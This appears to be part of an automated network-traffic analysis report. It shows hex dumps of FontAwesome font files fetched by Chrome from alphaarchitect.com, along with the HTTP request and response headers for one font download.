                                                                                                                                                                                                                                                                        2024-12-20 12:44:39 UTC944INData Raw: 77 4f 46 46 00 01 00 00 00 00 51 94 00 0b 00 00 00 00 51 48 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4f 53 2f 32 00 00 01 08 00 00 00 60 00 00 00 60 0f 52 0f 25 63 6d 61 70 00 00 01 68 00 00 01 5c 00 00 01 5c c6 5c bd 0f 67 61 73 70 00 00 02 c4 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 02 cc 00 00 4a 78 00 00 4a 78 ca 2f a2 0e 68 65 61 64 00 00 4d 44 00 00 00 36 00 00 00 36 25 b4 de e4 68 68 65 61 00 00 4d 7c 00 00 00 24 00 00 00 24 08 14 04 6a 68 6d 74 78 00 00 4d a0 00 00 01 60 00 00 01 60 43 df 0d c0 6c 6f 63 61 00 00 4f 00 00 00 00 b2 00 00 00 b2 24 17 11 bc 6d 61 78 70 00 00 4f b4 00 00 00 20 00 00 00 20 00 69 01 1d 6e 61 6d 65 00 00 4f d4 00 00 01 9e 00 00 01 9e 79 49 69 01 70 6f 73 74 00 00 51 74 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: wOFFQQHOS/2``R%cmaph\\\gaspglyfJxJx/headMD66%hheaM|$$jhmtxM``ClocaO$maxpO inameOyIipostQt
                                                                                                                                                                                                                                                                        2024-12-20 12:44:39 UTC1369INData Raw: 19 19 3b 19 18 03 27 27 5b 26 25 05 0c 0d 70 05 08 02 02 02 03 80 64 47 fd 56 47 64 64 47 02 aa 47 64 fd 65 04 04 03 09 05 d0 01 82 05 09 03 04 03 0d 07 85 01 03 21 22 4e 20 20 08 0e 02 04 fe 4d 01 fe e2 05 09 04 03 04 0e 07 2e 2d 6d 2d 2d 06 45 45 a2 43 43 08 0d 04 03 04 09 05 00 00 00 00 02 00 6c ff eb 03 94 03 15 00 13 00 2a 00 00 13 03 37 26 36 37 36 16 17 1e 01 07 0e 01 27 07 25 37 27 07 01 30 07 0e 01 07 06 07 0e 01 31 17 30 36 37 36 37 3e 01 37 36 31 27 d4 68 8b 07 05 0f 13 39 13 14 01 13 0f 37 13 8a 01 36 71 89 cc 02 0b 1e 1f 4d 24 24 0c 16 17 56 75 17 0c 24 24 4e 1e 1e b5 01 3f fe c2 8c 12 34 0f 14 01 14 13 3a 13 0f 04 08 8b 6d cc 88 6d 01 d6 1f 1e 4e 24 24 0b 16 78 56 17 18 0b 25 24 4d 1f 1e b5 00 00 00 03 00 00 00 7f 04 00 02 e3 00 49 00 50 00
                                                                                                                                                                                                                                                                        Data Ascii: ;''[&%pdGVGddGGde!"N M.-m--EECCl*7&676'%7'0106767>761'h976qM$$Vu$$N?4:mmN$$xV%$MIP
                                                                                                                                                                                                                                                                        2024-12-20 12:44:39 UTC1369INData Raw: 12 58 4d 2d 2d 4d 15 15 26 18 0d 09 09 21 1d 1d 34 32 36 36 5a 1e 1d 02 4c 37 3b 19 0d 48 47 ae 50 4f 1c 32 58 2f 17 3c 3d ae 6d 6d 79 79 33 32 11 3f 3e 6a 35 6d 54 54 65 6c 62 32 41 41 70 22 23 0a 0a 26 26 53 20 21 00 00 00 00 02 00 00 00 80 04 00 02 40 00 1b 00 37 00 00 13 34 37 3e 01 37 36 33 32 17 1e 01 17 16 15 14 07 0e 01 07 06 23 22 27 2e 01 27 26 25 34 37 3e 01 37 36 33 32 17 1e 01 17 16 15 14 07 0e 01 07 06 23 22 27 2e 01 27 26 00 12 11 3d 29 29 2e 2e 29 29 3d 11 12 12 11 3d 29 29 2e 2e 29 29 3d 11 12 02 40 12 11 3d 29 29 2e 2e 29 29 3d 11 12 12 11 3d 29 29 2e 2e 29 29 3d 11 12 01 60 2e 29 29 3d 11 12 12 11 3d 29 29 2e 2e 29 29 3d 11 12 12 11 3d 29 29 2e 2e 29 29 3d 11 12 12 11 3d 29 29 2e 2e 29 29 3d 11 12 12 11 3d 29 29 00 07 00 00 ff 80 04 00
                                                                                                                                                                                                                                                                        Data Ascii: XM--M&!4266ZL7;HGPO2X/<=mmyy32?>j5mTTelb2AAp"#&&S !@747>7632#"'.'&%47>7632#"'.'&=))..))==))..))=@=))..))==))..))=`.))==))..))==))..))==))..))==))
                                                                                                                                                                                                                                                                        2024-12-20 12:44:39 UTC1369INData Raw: 2f 61 22 0d 03 0a 09 20 0c 14 48 27 27 48 14 01 7d 4b 35 24 3b 11 31 77 41 4c 92 0a 32 1f 28 38 38 28 1b 2d 0d a2 0e 1a 06 67 40 74 30 11 3b 24 35 4b 2b 21 06 06 23 23 7a 52 51 5d 5d 51 52 7a 23 23 06 06 21 2b a0 0f 15 15 0f 0f 15 15 fc ef 26 1a 13 1f 08 19 29 10 11 17 01 c0 4d 44 44 65 1d 1d 1d 1d 65 44 44 4d 4d 44 44 65 1d 1d 1d 1d 65 44 44 01 4b 10 29 19 08 1f 13 1a 26 17 01 00 1b 25 25 1b 1b 25 25 1b 1b 25 25 1b 1b 25 25 6e 0a 04 0c 0c 20 09 1c 20 20 1c 09 20 0c 0c 04 0a 0f 1c 1c 0f 01 09 35 4b 24 1e 1b 22 04 ab 2a 1c 24 38 28 28 38 1c 17 30 03 0c 0d e9 04 21 1b 1e 24 4b 35 27 3f 0f 12 26 13 42 3b 3a 57 19 19 19 19 57 3a 3b 42 13 26 12 0f 3f 01 6b 15 0f 0f 15 15 0f 0f 15 fe bc 1a 26 14 11 13 2b 18 07 20 fe 60 13 13 43 2c 2c 33 33 2c 2c 43 13 13 13 13
                                                                                                                                                                                                                                                                        Data Ascii: /a" H''H}K5$;1wAL2(88(-g@t0;$5K+!##zRQ]]QRz##!+&)MDDeeDDMMDDeeDDK)&%%%%%%%%n 5K$"*$8((80!$K5'?&B;:WW:;B&?k&+ `C,,33,,C
                                                                                                                                                                                                                                                                        2024-12-20 12:44:39 UTC1369INData Raw: 80 c0 80 80 02 00 80 80 80 80 80 fe c0 80 80 80 80 80 fe c0 80 80 80 80 80 00 03 00 00 ff dc 03 ff 03 00 00 10 00 2a 00 47 00 00 25 14 06 23 21 22 26 35 11 34 36 33 21 32 16 15 11 03 21 22 06 15 14 16 17 1e 01 17 1e 01 3b 01 32 36 37 3e 01 37 3e 01 35 34 26 17 0e 01 07 0e 01 07 0e 01 2b 01 22 26 27 2e 01 27 2e 01 27 11 14 16 33 21 32 36 35 11 03 ff 36 25 fc b7 25 36 36 25 03 49 25 36 5b fc b7 07 0b 2d 27 39 73 39 17 48 1e 01 1e 48 17 39 73 39 1c 38 02 02 09 14 0b 3d 7a 3c 20 4e 2d 01 2d 4e 20 3c 7a 3e 0a 14 09 0b 07 03 49 07 0b 37 25 36 36 25 02 6e 25 36 36 25 fd 92 02 80 0b 07 31 53 1e 2d 5b 2d 13 3b 3b 13 2d 5b 2d 15 53 24 0b 1d c9 0a 13 09 2f 60 32 1b 35 35 1b 32 60 2f 09 13 0a fe 49 07 0b 0b 07 01 b7 00 00 00 00 01 00 42 ff 80 03 be 03 80 00 3a 00 00
                                                                                                                                                                                                                                                                        Data Ascii: *G%#!"&5463!2!";267>7>54&+"&'.'.'3!2656%%66%I%6[-'9s9HH9s98=z< N--N <z>I7%66%n%66%1S-[-;;-[-S$/`2552`/IB:
                                                                                                                                                                                                                                                                        2024-12-20 12:44:39 UTC1369INData Raw: 1e 01 15 14 06 07 03 79 12 2b 19 13 1f 1f 4e 2e 2e 33 32 2e 2e 4e 1f 1f 13 19 2b 13 0d 0e 01 32 24 02 95 23 32 0e fd fa 0d 1a 0c 0e 12 03 03 22 64 3b 3a 62 22 05 05 15 0f 0c 1a 0f 12 18 18 11 02 06 56 78 26 06 06 17 10 2f 40 11 12 3d 28 29 2f 2e 29 29 3c 12 12 3f 30 10 16 06 05 27 78 56 03 04 03 12 14 1b 14 9e 19 27 10 2b 24 24 34 0e 0e 0e 0e 34 24 24 2b 10 27 19 11 3a 13 05 66 23 32 32 23 66 05 13 3a 98 01 04 02 03 17 0f 07 0b 05 2b 33 31 29 05 0e 08 0f 18 03 02 04 01 04 18 13 12 18 03 06 25 21 06 0e 09 10 19 01 0a 47 2f 09 2f 29 29 3e 11 12 12 11 3e 29 29 2f 09 2f 47 0a 01 19 10 09 0e 06 21 25 06 03 18 12 14 19 03 00 01 00 d7 01 5a 03 29 01 c0 00 0d 00 00 01 21 22 06 15 14 16 33 21 32 36 35 34 26 03 0a fd ec 15 0a 0a 15 02 14 15 0a 0a 01 c0 1e 15 15 1e
                                                                                                                                                                                                                                                                        Data Ascii: y+N..32..N+2$#2"d;:b"Vx&/@=()/.))<?0'xV'+$$44$$+':f#22#f:+31)%!G//))>>))//G!%Z)!"3!2654&
                                                                                                                                                                                                                                                                        2024-12-20 12:44:39 UTC1369INData Raw: fe cb 06 06 07 0f 09 3f 0a 0f 06 07 06 06 07 06 0f 0a 3f 09 0f 07 06 06 fe cb 06 06 07 0f 09 3f 09 10 05 06 06 06 06 05 10 09 3f 09 10 06 06 06 00 00 00 00 04 00 00 ff c0 04 00 03 00 00 03 00 07 00 13 00 18 00 00 13 11 21 11 03 21 11 21 05 34 36 33 32 16 15 14 06 23 22 26 13 21 13 01 37 00 04 00 40 fc 80 03 80 ff 00 38 28 28 38 38 28 28 38 c0 fd 00 c0 01 00 80 03 00 fc c0 03 40 fd 00 02 c0 a0 28 38 38 28 28 38 38 fe 48 02 00 fe c0 60 00 00 04 00 00 00 00 04 00 03 00 00 03 00 0b 00 17 00 1d 00 00 13 11 21 11 03 27 07 27 01 11 21 11 01 34 36 33 32 16 15 14 06 23 22 26 01 21 11 33 11 21 80 03 80 40 80 91 6f fe 80 03 00 fd 40 38 28 28 38 38 28 28 38 02 80 fc 80 40 03 40 02 80 fd 80 02 80 fd eb d5 79 b9 fe c0 02 00 fe 2b 01 35 28 38 38 28 28 38 38 01 88 fd 80
                                                                                                                                                                                                                                                                        Data Ascii: ????!!!4632#"&!7@8((88((8@(88((88H`!''!4632#"&!3!@o@8((88((8@@y+5(88((88
                                                                                                                                                                                                                                                                        2024-12-20 12:44:39 UTC1369INData Raw: 15 14 07 06 07 06 07 06 27 22 07 06 15 14 17 16 33 32 37 36 35 34 27 26 17 15 14 07 06 07 06 07 06 23 22 27 26 27 06 07 06 07 06 07 06 23 22 27 26 27 26 27 26 27 23 22 27 26 35 11 34 37 36 33 21 26 35 34 37 36 37 36 37 36 33 32 17 16 17 16 17 16 15 14 07 06 07 06 07 06 23 22 27 26 27 15 21 32 17 16 15 01 22 07 06 07 06 07 06 15 14 17 16 17 16 17 16 33 32 37 36 37 36 37 36 35 34 27 26 27 26 27 26 23 03 33 35 21 15 33 11 33 05 11 23 11 14 07 06 2b 01 16 17 16 17 16 17 16 33 32 37 36 37 36 37 36 35 37 35 23 11 16 17 16 33 32 37 36 37 36 37 36 35 03 70 17 15 14 0f 10 08 09 09 08 10 0f 14 14 18 17 15 14 0f 10 08 09 09 08 10 0f 14 15 17 14 0e 0e 0e 0e 14 14 0e 0e 0e 0e 7c 0d 0c 16 16 1d 1d 21 13 14 13 11 0d 17 19 20 20 27 27 2a 31 2b 2c 21 22 16 17 06 f7 12 0c
                                                                                                                                                                                                                                                                        Data Ascii: '"327654'&#"'&'#"'&'&'&'#"'&54763!&5476767632#"'&'!2"3276767654'&'&'&#35!33#+32767676575#327676765p|! ''*1+,!"
                                                                                                                                                                                                                                                                        2024-12-20 12:44:39 UTC1369INData Raw: 02 01 4a 02 01 9e 01 01 01 01 01 25 5f 48 48 48 48 29 26 01 01 01 01 01 26 28 29 26 01 01 01 01 01 26 28 01 27 01 9d 01 01 01 01 01 25 78 01 01 4b 02 01 01 01 01 4b 02 78 26 01 01 01 01 01 9c 01 00 04 00 32 ff 80 03 ce 03 80 00 11 00 69 00 76 00 83 00 00 01 32 16 17 11 2f 02 17 21 22 26 35 11 34 36 33 21 05 23 07 1e 01 31 2e 01 27 26 06 07 23 22 06 07 0e 01 31 30 36 37 27 30 06 07 30 07 0e 01 07 06 15 30 16 17 30 36 37 2e 01 31 30 16 17 33 32 16 33 15 30 16 33 1e 01 17 1e 01 17 1e 01 37 3e 01 37 3e 01 37 30 06 07 1e 01 31 3e 01 17 34 27 2e 01 27 26 31 2e 01 23 37 17 32 16 15 14 06 23 22 26 35 34 36 33 23 32 16 15 14 06 23 22 26 35 34 36 33 03 5f 2d 40 02 72 3f 44 1c fd a9 2d 3f 40 2d 02 c0 fe fb 02 08 42 41 2b 4e 27 1b 37 17 09 0f 3e 2b 0f 10 42 47 06 5a
                                                                                                                                                                                                                                                                        Data Ascii: J%_HHHH)&&()&&('%xKKx&2iv2/!"&5463!#1.'&#"1067'000067.10323037>7>701>4'.'&1.#72#"&5463#2#"&5463_-@r?D-?@-BA+N'7>+BGZ
                                                                                                                                                                                                                                                                        2024-12-20 12:44:39 UTC1369INData Raw: 11 0b 18 0b 0c 1a 10 17 11 1c 0c 0c 18 0c 12 1d 09 06 06 02 01 01 01 12 47 07 0d 06 06 0e 07 0a 10 05 03 03 01 fd 12 1f 17 16 1f 1f 16 17 1f 36 36 4d 4d 36 35 4d 4d 6b 1f 17 16 1f 1f 16 17 1f 36 36 4d 4d 36 35 4d 4d 00 03 00 00 ff c9 03 6e 03 37 00 0f 00 42 00 5f 00 00 25 35 34 26 2b 01 22 06 1d 01 14 16 3b 01 32 36 13 34 27 2e 01 27 26 23 22 06 07 06 16 1f 01 1e 01 33 32 36 37 3e 01 37 3e 01 33 32 16 15 14 06 07 0e 01 1d 01 14 16 3b 01 32 36 35 31 34 36 37 3e 01 35 17 14 07 0e 01 07 06 23 22 27 2e 01 27 26 35 34 37 3e 01 37 36 33 32 17 1e 01 17 16 15 02 00 0a 08 6e 08 0a 0a 08 6e 08 0a 93 13 13 3b 26 25 25 45 6a 25 03 02 06 4b 03 05 03 04 08 03 14 15 08 07 1a 10 1b 2b 18 1a 1f 41 0a 08 6e 08 0a 17 15 20 47 db 23 22 77 50 50 5b 5b 50 50 77 22 23 23 22 77
                                                                                                                                                                                                                                                                        Data Ascii: G66MM65MMk66MM65MMn7B_%54&+";264'.'&#"3267>7>32;2651467>5#"'.'&547>7632nn;&%%Ej%K+An G#"wPP[[PPw"##"w


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        2192.168.2.449743141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC845OUTGET /wp-content/themes/Avada/includes/lib/assets/fonts/fontawesome/webfonts/fa-regular-400.woff2 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        Origin: https://alphaarchitect.com
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC426INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:40 GMT
                                                                                                                                                                                                                                                                        Content-Type: font/woff2
                                                                                                                                                                                                                                                                        Content-Length: 13264
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 24 Oct 2024 14:49:56 GMT
                                                                                                                                                                                                                                                                        ETag: "671a5e94-33d0"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147798
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9a1dfea7c78-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC943INData Raw: 77 4f 46 32 00 01 00 00 00 00 33 d0 00 0d 00 00 00 00 83 c8 00 00 33 76 01 4b 85 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 46 46 54 4d 1c 1a 1e 06 60 00 87 5a 11 08 0a 81 da 5c 81 ab 22 01 36 02 24 03 84 54 0b 82 36 00 04 20 05 8a 5b 07 8f 2b 1b f1 69 55 47 7c 8f 03 80 d9 c6 10 45 09 d9 d4 65 ff 7f 3f 50 63 0c e1 f5 80 50 ab 35 47 10 1e 41 62 61 e0 30 8a 10 18 70 45 38 ac 57 da e6 b8 be 65 9e ad c2 75 b8 2c 1e 81 43 e0 10 38 04 b6 4a 94 5c b6 de 1a 0d 86 5f e4 41 27 aa 7e cf 55 d6 56 96 33 5a 86 64 7a bb fe 3c 16 88 8e 69 c1 b4 da f9 59 fa 67 e7 ed eb eb 23 f2 1f aa 62 34 27 1c 92 14 4d 1e be c6 68 ef ef 9e a8 27 cc 2c 8a 36 6f a6 f5 2a 97 10 ef 74 86 44 22 d1 a0 04 d1 b6 c3 f3 6e fb 3f ac 7b 2f 70 59 82 80 48 82 80 8a 0b 24 40 cb
                                                                                                                                                                                                                                                                        Data Ascii: wOF233vK?FFTM`Z\"6$T6 [+iUG|Ee?PcP5GAba0pE8Weu,C8J\_A'~UV3Zdz<iYg#b4'Mh',6o*tD"n?{/pYH$@
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC1369INData Raw: 05 f5 39 f5 7f d4 5b d4 ef a8 43 d4 6e ea 32 ea 12 6a 25 d5 4a b5 50 cd 54 23 55 47 85 a9 78 ca 67 ca 7f 94 f7 94 d7 94 bb 94 3b 94 fd 94 7d 94 bd 94 21 ca 2e ca 26 4a 0f a5 99 b2 90 12 47 71 43 af a3 3b 50 1b f9 32 79 80 2c 21 b3 c8 38 d2 b4 fd 25 7d 22 3d 27 3d 21 dd 25 dd 18 16 7f 15 41 2b 84 40 69 65 88 9d 44 c9 b1 ff f4 80 05 86 d3 80 a9 34 29 07 b7 54 81 fe ab 00 18 c8 00 60 a8 24 de 8c 37 c8 2b bb 9c 66 1c 40 3c f8 44 70 58 24 84 21 24 b8 dd 13 21 00 c6 c6 f8 0f 1b 16 c3 88 06 21 40 27 95 c1 28 60 0c 46 44 c4 b3 55 04 20 85 40 5e 4c 32 14 3c 80 6c 8c 43 84 c8 8f f1 44 24 09 39 b1 b6 48 d0 92 53 cb 50 f0 5d c5 03 26 0a 35 a2 de 8d a6 bf 6a 09 75 63 b8 98 0f 6c 80 d3 52 10 88 05 e2 70 12 60 d4 0a 9a d2 c6 d0 0f 53 85 c5 4e a4 00 f7 c0 03 4b 43 6f 39
                                                                                                                                                                                                                                                                        Data Ascii: 9[Cn2j%JPT#UGxg;}!.&JGqC;P2y,!8%}"='=!%A+@ieD4)T`$7+f@<DpX$!$!!@'(`FDU @^L2<lCD$9HSP]&5juclRp`SNKCo9
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC1369INData Raw: b1 b0 90 1f 3a 9a 17 f3 5b 0b 94 65 49 ab 58 ec 93 9c 1d 31 45 c9 3c 8e 9d 49 06 d6 17 b6 fa 54 b9 8c 02 38 03 66 34 fe 90 aa 68 ef a3 27 50 6a 4d d2 1c cb 5d 21 12 0b 7d 56 21 da e0 92 d0 1b 84 2d 4b 4d d6 5b 10 23 d4 6b 52 af 95 d5 07 f2 27 d5 3c bc 5a cd ac e5 26 7a 71 25 81 8a f5 aa 6e a8 ab 46 24 77 b5 c4 7f 01 75 86 e2 06 44 3b 98 b2 75 c5 9b a1 2e 1a 02 6a ed 35 00 8b 1c cd b3 77 1b ef 0b c3 92 56 f2 d8 2a e6 63 b6 0c ec db 50 11 f7 a1 e2 e2 46 4a 5c 0c 34 e2 61 4e 61 61 cd 9f 42 f5 2b bf 20 eb d2 61 59 64 49 0d fe 04 cd fd 1c 6a b6 05 63 e0 e8 76 73 d5 bf 42 58 2b 15 32 f1 9f c0 1e b5 a6 83 04 9f f3 bb 06 cb a5 12 c6 c7 37 f5 2f fe 9c 3d f3 5f 78 11 6f 7b 2d bf c1 c0 58 d7 bd ea fb d9 32 41 58 53 d6 30 03 dd 86 bf 96 1d 9c a3 1f 1d d1 c8 53 75 7e
                                                                                                                                                                                                                                                                        Data Ascii: :[eIX1E<IT8f4h'PjM]!}V!-KM[#kR'<Z&zq%nF$wuD;u.j5wV*cPFJ\4aNaaB+ aYdIjcvsBX+27/=_xo{-X2AXS0Su~
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC1369INData Raw: 39 85 0c ec 05 ae 79 ab 24 b5 17 73 4d 5e bf f6 e1 48 48 ce 2e a4 04 df a1 2e 70 6d a1 b9 5d 44 be 42 92 d4 d1 4c e7 6a f7 67 c2 15 9c f0 8d ea 07 2c 03 77 d0 84 6e 1b 08 0e c0 c4 00 46 30 29 31 ff 98 34 e5 42 14 8f 82 91 3c fb 49 04 e6 48 70 52 74 39 3b 29 9e 5c 25 e7 31 91 60 c6 6f e3 f3 0e 40 82 74 de c9 c2 c5 13 51 82 42 ce 07 10 06 40 cd 60 8a 24 94 97 10 f2 dd 30 c9 ca 8b 3e 63 11 88 f5 38 a2 ab 41 b0 fa ae 29 4f 59 ee 0c 54 3c 7d ef 58 b2 a4 cd 73 c1 6d 02 51 af 12 6b 5a dd dc 91 f2 a6 35 2c ab af e6 48 b3 d8 11 fd 54 17 82 4e 6c b8 3a d0 5a 6e f9 54 a6 fd 5e 1c f7 eb c0 b9 64 24 78 0c 56 a8 89 13 5c d5 1f de 92 6a d1 24 b8 56 88 7f a3 5f 9d ed 47 fe 8c d7 c5 ad 5b bf 78 e9 e1 00 b9 b9 85 4c 80 d8 e9 94 23 50 87 69 53 0d 15 96 ab 00 66 3e 57 35 4a
                                                                                                                                                                                                                                                                        Data Ascii: 9y$sM^HH..pm]DBLjg,wnF0)14B<IHpRt9;)\%1`o@tQB@`$0>c8A)OYT<}XsmQkZ5,HTNl:ZnT^d$xV\j$V_G[xL#PiSf>W5J
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC1369INData Raw: 4c 41 6a db 18 8b cd dd d2 c4 c6 6f bd aa f3 2a 7b d5 ca b3 97 48 66 d0 b5 4b 79 c4 af 95 c6 f2 15 52 50 a4 37 31 cc 0a 7f c6 b3 db eb aa a9 38 d9 97 60 6e 29 f6 4c a2 d8 3d 1d e6 83 4c 14 ee 0e 51 2c ad f4 4f 60 ee 7b 9a b8 42 d9 c9 90 e6 1d 66 34 7e 97 a6 21 df c2 7a 7d 23 29 a8 db 7c 0b 3e bc 73 f3 b5 0d b3 6f 15 a7 bb 48 6b b3 19 3e 0b 07 95 b6 a7 2a 9d 5f 80 c0 7f d0 7c 7c 2f dc e3 ac e0 b9 19 2b 9d 12 2a 7f 63 b6 3d 24 a5 3a e6 0b c9 a6 7d ab e5 86 f3 2b 22 72 4a 03 d7 42 3f 5e 1b f4 5f 88 78 72 48 bd 9b 24 3c 22 57 8d 38 f6 c3 a8 b1 32 c6 4d c2 65 f7 61 8f c2 1d 55 35 0c e1 5b 96 aa 1b 29 c0 3a 98 dd cc c3 44 1d 58 30 da a2 a0 7e e8 8b f4 9a 8a 59 c0 62 a0 5a 5c e1 08 3f 35 12 b1 9a 8c 38 46 78 b6 29 33 fd 04 57 59 25 6c 60 31 c5 9c e9 ff e1 8b 21
                                                                                                                                                                                                                                                                        Data Ascii: LAjo*{HfKyRP718`n)L=LQ,O`{Bf4~!z}#)|>soHk>*_||/+*c=$:}+"rJB?^_xrH$<"W82MeaU5[):DX0~YbZ\?58Fx)3WY%l`1!
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC1369INData Raw: 51 5b aa 1f 34 70 6d b4 6f c7 d9 10 96 3d a4 d7 5b 37 a5 f3 5a b2 d8 1e b1 38 37 3b fc fd a8 2a ed 19 27 92 84 e6 c3 d1 02 9d 4e 10 ed 6f c6 3a 9f 1f d9 00 9d be b9 a9 ad a0 20 0e b9 88 d9 0c 5b 17 2f b6 56 02 da ae c9 f6 34 50 00 41 7e 4f eb 74 2d 16 08 1a 7a 3a 04 41 9d c5 52 14 8d eb 64 ba a4 e3 64 8b 38 02 fd 1c 28 08 be b5 8a d6 99 6d 55 9d b4 55 a5 5f dd 76 a3 ba dd 56 f1 92 2b 86 14 5f 2a 68 7a da 74 3c 89 27 b2 e5 24 17 57 03 f6 a9 45 40 64 54 2b 71 cf 52 84 c1 91 32 57 91 c1 87 84 eb a0 68 29 42 f4 35 2a 24 55 76 e0 88 b1 00 bb 46 cd 3c dc 43 f7 f3 90 a0 3c 73 0d 35 8a 0a 9e f4 00 bc 97 25 0e c0 77 7f 8e 1d 54 ff b2 ed a0 22 d1 8b eb 1a be 79 b8 6b f9 23 42 df 5f 9d ac 29 5b 02 2f 24 7f dd d2 79 a8 c4 c3 8f de 73 98 a9 5e 83 05 b1 c4 97 d5 92 0c
                                                                                                                                                                                                                                                                        Data Ascii: Q[4pmo=[7Z87;*'No: [/V4PA~Ot-z:ARdd8(mUU_vV+_*hzt<'$WE@dT+qR2Wh)B5*$UvF<C<s5%wT"yk#B_)[/$ys^
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC1369INData Raw: 8f 46 f2 53 e6 2e 07 03 0e 62 d5 5a 91 e5 49 aa 24 25 23 3b 9b a1 bc 6a 92 6e 7a 02 a3 45 c9 c8 a1 fd 63 bf a7 5f b1 f7 4d 2d 92 81 1e 6c 4d d9 86 0d b7 f5 18 ca b8 c5 3a 43 87 ef b3 64 89 c6 a2 7f 48 e0 c6 87 d9 14 a1 93 e9 f5 f5 fb ec 7b 90 1e 64 92 9e 36 d2 5a 17 98 67 2a 8c bd 22 40 13 b5 f2 e9 3f 10 95 63 e8 e8 79 39 b2 ed 3d d2 7f 97 1d f9 d1 3e 2f a0 d1 7f 9f 70 f2 5d 05 cb 2e f3 50 11 18 25 4d 91 52 cd f4 d1 03 c4 f9 dd 22 00 bd ee 2f d8 bf 68 bd 5b 18 6e 4f 9f a7 7a eb 9c c3 fc e8 7b ff 84 4f 1a 64 0a 51 72 df b1 2f bd 47 b3 31 25 4f 97 6d 4c fe 16 4b c5 79 79 89 66 74 9c e8 e1 0f 9f b2 53 23 a3 b5 77 c4 74 c9 a5 1e 4e d2 a1 52 c2 06 6e 21 97 64 ff 66 bb 60 48 88 48 19 b1 5c a2 1b 89 eb ef 56 16 e4 5a 47 60 90 dc 5c 0a 70 18 2c c4 29 94 12 29 24
                                                                                                                                                                                                                                                                        Data Ascii: FS.bZI$%#;jnzEc_M-lM:CdH{d6Zg*"@?cy9=>/p].P%MR"/h[nOz{OdQr/G1%OmLKyyftS#wtNRn!df`HH\VZG`\p,))$
                                                                                                                                                                                                                                                                        2024-12-20 12:44:40 UTC1369INData Raw: c3 34 2e f8 75 e7 a0 2b c2 9d fd 53 5f 54 48 60 39 26 7c 2c c7 3c 4f 38 43 f5 bd 9d 93 e6 4b 9e 31 ff 14 16 cf fb bd f6 8d 67 d9 9d 98 b8 66 1e f4 bc 2e 4e 3b 48 4d d3 18 86 35 5c 5b e0 4e 3e 7f a5 d0 30 22 17 6c 0a e0 85 c9 46 e6 0e 1b e7 fa 6d 0f 1c 09 17 94 6a ce e8 52 c4 f5 3d 12 42 eb 4c cd de f1 ac fe 6c f3 07 3f 4c 39 7f eb 7c 30 0f 25 77 88 4d 08 9b 57 1b 93 c4 39 2c 9a b3 a0 af e1 cb 0f f2 ad 21 56 7e 02 de 16 7f 09 aa ad 49 fa 54 22 83 78 98 26 e3 d5 62 b0 a6 96 10 51 73 47 57 d4 d7 e6 ba a3 18 75 b3 89 f9 03 4c fc 13 e8 a1 4b b3 c0 75 90 cb 75 30 71 27 42 96 44 70 ac 6d e5 20 58 12 82 74 2a 44 a5 e3 68 30 7f fa 2f 2a 8a d1 66 1a 57 7d 3c 83 0b 0f 26 84 74 ef b3 d7 d8 f7 b9 a4 20 79 1d 78 93 99 33 85 f2 0d 31 3a cc e0 db f8 de 61 fa 9a 35 5d 44
                                                                                                                                                                                                                                                                        Data Ascii: 4.u+S_TH`9&|,<O8CK1gf.N;HM5\[N>0"lFmjR=BLl?L9|0%wMW9,!V~IT"x&bQsGWuLKuu0q'BDpm Xt*Dh0/*fW}<&t yx31:a5]D
